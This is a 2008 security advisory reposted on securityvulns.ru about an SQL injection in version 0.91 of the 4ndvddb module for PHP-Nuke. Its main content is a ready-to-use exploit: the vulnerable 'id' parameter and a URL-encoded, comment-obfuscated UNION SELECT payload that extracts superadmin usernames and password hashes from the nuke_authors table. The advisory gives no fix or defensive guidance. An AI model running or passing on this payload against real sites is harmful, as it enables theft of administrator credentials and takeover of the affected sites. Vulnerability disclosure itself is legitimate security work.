Computer Security

Security Advisory: PHP-NUKE SQL Module's Name 4ndvddb
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower

  Insufficient Anti-automation vulnerability in RavenNuke

From:lovebug_(at)_hotmail.it <lovebug_(at)_hotmail.it>
Date:09.07.2008
Subject:PHP-NUKE SQL Module's Name 4ndvddb

Module's Name: 4ndvddb
Module's Version: 0.91

+---------------------------------------+
|  SQL Injection Vulnerability PHP-NUKE
 | Module's Name: 4ndvddb
|          Module's Version: 0.91     |
|         found by lovebug       |
|            RBT-4 |
           www.rbt-4.net
+---------------------------------------+


#vuln: modules.php?name=4ndvddb&rop=show_dvd&id=

#sql= 1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2
A%2A%2F0%2C0,aid,pwd,3,4,5,6,7,8,9,
10%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F
%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%
2A

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru